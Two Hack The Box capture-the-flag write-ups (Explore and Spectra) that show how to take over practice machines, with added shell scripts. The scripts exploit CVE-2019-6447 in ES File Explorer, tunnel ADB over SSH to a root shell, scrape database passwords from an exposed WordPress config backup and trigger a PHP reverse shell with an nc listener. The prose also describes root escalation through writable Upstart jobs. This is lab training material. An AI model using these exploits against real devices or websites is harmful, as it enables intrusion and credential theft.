Hack The Box – Explore


Target IP: 10.10.10.247
Box: https://app.hackthebox.eu/machines/Explore

First we run Nmap to detect open ports. As shown in figure 1, a default top-1000-ports scan finds only two: port 2222, which is SSH, and port 5555, which is filtered, so Nmap cannot tell what service sits behind it.

1. Nmap results for most common 1000 ports.

To make sure port 2222 really is SSH and not something we identified incorrectly, we pull the banner with a script and version scan.

2. Script and Version scan for port 2222.

The SSH banner says Banana Studio. Since this is quite uncommon we look for more information on it: a quick Google search tells us that it is an Android application.

Since port 2222 is the only service we can reach so far, we run another Nmap scan with -p- to check all 65535 TCP ports of the system.

This indeed finds two more open ports, which we run script and version scans against afterwards. One of them looks especially odd.

3. Nmap identified another open port which looks quite uncommon.

Nmap guesses that port 59777 is an httpd for a Minecraft game server. Searching for "port 59777" instead tells us that it is most often used by ES File Explorer, a file manager for Android. This fits, since we already saw that the SSH server is an Android app.

The same search points us directly at a vulnerability in this service, CVE-2019-6447: the HTTP server that ES File Explorer opens on port 59777 accepts commands from anyone who can reach it, without any authentication, which allows listing and downloading files from the device. A quick look at exploit-db turns up an exploit for it.

We download the exploit and run it against the target. It works and lets us list and download files from the target, and we quickly spot an interesting file called creds.jpg.

4. Exploiting CVE-2019-6447 to list and download files.
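The interaction the exploit performs, as an added example rather than the exploit-db script itself: the ES File Explorer HTTP service takes a JSON command in a POST body and hands back a JSON array, and it serves any file by its absolute device path on a plain GET. The target IP and port are the ones from the scans above; the command names (listPics, listFiles, getDeviceInfo) are the ones the service understands, and the sample listing in the comments is constructed.

```shell
#!/bin/sh
# Added example, not the exploit-db PoC: talk to the ES File Explorer
# HTTP service (CVE-2019-6447) with curl. The service accepts an
# unauthenticated JSON command in a POST body and serves any file by its
# absolute device path on GET. Target and port are from the Nmap scans.
TARGET="${TARGET:-10.10.10.247}"
PORT="${PORT:-59777}"

# Build the JSON body for one command (listFiles, listPics, getDeviceInfo, ...).
es_body() {
    printf '{"command":"%s"}' "$1"
}

# Send a command; the service answers with a JSON array of objects.
es_cmd() {
    curl -s -X POST -H 'Content-Type: application/json' \
        -d "$(es_body "$1")" "http://$TARGET:$PORT/"
}

# Pull the "location" (absolute path) fields out of a listing on stdin,
# one per line. Enough for the flat JSON the service returns, e.g.
# [{"name":"creds.jpg","location":"/storage/emulated/0/DCIM/creds.jpg",...}]
es_locations() {
    grep -o '"location":"[^"]*"' | sed 's/^"location":"//; s/"$//'
}

# Download a file by its absolute path on the device into a local file.
es_get() {
    curl -s -f -o "$2" "http://$TARGET:$PORT$1"
}

if [ "${1:-}" = "--run" ]; then
    es_cmd getDeviceInfo; echo
    # listPics is where the image turns up; listFiles covers the sdcard root.
    es_cmd listPics | es_locations | while read -r path; do
        echo "found: $path"
        case "$path" in
            */creds.jpg) es_get "$path" "$(basename "$path")" && echo "saved $path" ;;
        esac
    done
fi
```

Run it with `--run` against the box; without the flag it only defines the helpers. Downloading by the path the listing returns, rather than by a guessed path, avoids having to know the storage layout of the device in advance.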

We download the file and take a look at it. The image contains credentials for a user called Kristi, as shown in figure 5.

5. Content of creds.jpg

We log in with these credentials over SSH on port 2222 and we are in. After a quick look at the box we remember the port that was filtered in the first scan, so let's check whether it is listening locally.

6. Checking ports on the system to find port 5555 locally listening.

We use Google one more time to search for “android port 5555”. Doing so gives us an article that is about ADB – Android Debug Bridge.

“For the ones not aware of what is ADB, try to think of it as the shell for Android devices, that lets anyone execute commands and install whatsoever they want, thus allowing them to take full control of the device without the need to authenticate. “

That sounds very much like what we are looking for. We install ADB on our attacking Linux machine.

We then create an SSH local port forward, so that port 5555 on our attacking machine is tunnelled to port 5555 on the target's loopback interface. ADB can now connect to port 5555 on our localhost and reach the ADB daemon on the remote system.

As shown in figure 7, this gives us an adb shell on the device, and su elevates it to root without asking for a password.

7. Creating a port forward over SSH (top) and using ADB to get root access (bottom).
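The forward and the connection, written out as an added example that is not the author's own command line. It assumes Kristi's password from creds.jpg, the target IP and SSH port from the scans, and a free local port 5555. adb_ready is a small helper that picks whichever serial adb reports in the "device" state, because adb may list a loopback device under a different serial than the one passed to adb connect, and an "offline" or "unauthorized" entry is not usable.

```shell
#!/bin/sh
# Added example (not the write-up's own commands): tunnel the phone's ADB
# port over the SSH session as kristi, then attach with adb from the
# attacker side. Target and SSH port come from the scans above; the
# local port is an assumption.
TARGET="${TARGET:-10.10.10.247}"
LPORT="${LPORT:-5555}"

# Given `adb devices` output on stdin, print the serial of the first
# entry in "device" state (offline/unauthorized entries are skipped).
adb_ready() {
    awk '$2 == "device" { print $1; exit }'
}

if [ "${1:-}" = "--run" ]; then
    # -N: no remote command, -f: go to the background after authentication.
    # The remote side is 127.0.0.1:5555, which only listens locally on the box.
    ssh -f -N -p 2222 -L "$LPORT:127.0.0.1:5555" "kristi@$TARGET"
    adb connect "127.0.0.1:$LPORT"
    serial=$(adb devices | adb_ready)
    if [ -z "$serial" ]; then
        echo "no device in 'device' state; check the forward with: adb devices" >&2
        exit 1
    fi
    # adb shell lands in the unprivileged shell user; typing su in that
    # shell drops to root, which on this box asks for no password.
    adb -s "$serial" shell
fi
```

If adb connect reports the device as offline, the usual cause is a forward that never came up; `adb kill-server` followed by a fresh connect clears a stale entry.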


Hack The Box – Spectra


Target IP: 10.10.10.229
Attacker IP: 10.10.14.84
Box: https://app.hackthebox.eu/machines/Spectra

First we start with an Nmap scan as usual. Figure 1 shows that SSH (22), HTTP (80) and MySQL (3306) are available.

1. Nmap scan of target system

We start with the web service on port 80 by browsing to the website.

2. Browsing the web service on port 80

From here there are two destinations we can go to, but both point at the hostname spectra.htb, so we need to add it to our local hosts file first if we do not want to replace the name with the IP address for every single page we visit.

The first site “software issue tracker” goes to a WordPress site as shown in figure 3.

3. WordPress site on target

Here we find nothing special, apart from the username of one of the WordPress authors: administrator. We can start a WPScan in the background, but it does not turn up anything useful.

The second link, labeled "Test", shows a database connection error.

4. DB connection error after following the “Test” link

By cutting the URL back to the /testing/ directory we get a directory listing of a WordPress installation.

5. Open directory listing

This is interesting because it contains the wp-config.php file. Requesting that file just gives the same database error as in figure 4, since the server executes it as PHP. Next to it, however, is wp-config.php.save, which returns a blank page: the .save extension is not handled by PHP, so the raw file is served and the browser simply hides the PHP block. Viewing the page source shows the code of that file, including the WordPress database credentials.

6. Credentials to the WordPress database

We are not allowed to connect to the database directly, but the password is reused: we can log in to the WordPress backend with the previously found username administrator and the database password devteam01.

Inside the backend we can open the Theme Editor, which lets us edit any file of a WordPress theme and sneak in reverse shell code, for example into the 404 template of the Twenty Seventeen theme as shown in figure 7.

7. Injecting a PHP reverse shell into a WordPress template

With a listener waiting on our machine, browsing to the template at http://spectra.htb/main/wp-content/themes/twentyseventeen/404.php executes the PHP code and gives us shell access to the system.

8. Reverse shell connection back to our machine
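The config leak and the shell trigger, as an added example rather than the author's own steps. wp_defines pulls the define() lines out of the served config text, which is the check to run against any stray copy of wp-config (.save, .bak, .old) a directory listing exposes; the hostname and paths are the ones from this write-up, the listener port is an assumption, and the reverse shell itself is whatever was saved into 404.php through the theme editor. The config text in the comments is a constructed sample.

```shell
#!/bin/sh
# Added example (not from the write-up): fetch the exposed backup config,
# recover the DB defines from it, then catch the shell that the 404.php
# edited in the theme editor connects back to. Host and paths are from the
# write-up; the listener port is an assumption.
WP="${WP:-http://spectra.htb}"
LISTEN_PORT="${LISTEN_PORT:-4444}"

# Turn lines like
#   define( 'DB_PASSWORD', 'devteam01' );
# from wp-config text on stdin into DB_PASSWORD=devteam01 lines. Tolerates
# the optional spaces WordPress puts inside the parentheses.
wp_defines() {
    sed -n "s/^[[:space:]]*define([[:space:]]*'\(DB_[A-Z_]*\)'[[:space:]]*,[[:space:]]*'\([^']*\)'.*/\1=\2/p"
}

# Print the value of one define name from config text on stdin.
wp_define() {
    wp_defines | sed -n "s/^$1=//p"
}

if [ "${1:-}" = "--run" ]; then
    # .save is not handed to PHP, so the raw source comes back.
    cfg=$(curl -s -f "$WP/testing/wp-config.php.save") || { echo "no config leak" >&2; exit 1; }
    printf '%s\n' "$cfg" | wp_defines
    # Request the edited template a moment after the listener is up; the
    # request blocks for as long as the PHP shell lives, so background it.
    ( sleep 2; curl -s "$WP/main/wp-content/themes/twentyseventeen/404.php" >/dev/null ) &
    nc -lvnp "$LISTEN_PORT"
fi
```

The password value wp_define returns is what gets tried against the WordPress login as administrator; on this box it is the devteam01 reuse noted above.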

The target machine is running Chromium OS, so it is most likely a Chromebook.

9. Discovering the host OS

Digging through the machine we find something interesting in /etc/: an autologin directory. Inside /etc/autologin/passwd we find a password, which seems to belong to a user account.

10. Finding user credentials

We enumerate the users of the system in /etc/passwd and then try the password against them over SSH.

After connecting as user katie, sudo -l shows that she is allowed to run /sbin/initctl with sudo without entering a password.

11. Sudo options of user Katie

initctl controls Upstart jobs, which are defined by configuration files in /etc/init/. Some of these job files are writable by us, since they are group-writable by developers and katie is a member of that group, as shown in figure 12.

12. Permissions of init scripts

Now that we can edit the test jobs, we place our reverse shell code inside one of them and start the job with sudo initctl. Upstart runs the job's script as root, which gives us privileged access. If the job is already running it has to be stopped first, because initctl refuses to start a job that is already running.

13. Placing shell code (top) and executing it (bottom left) grants us privileged access (bottom right)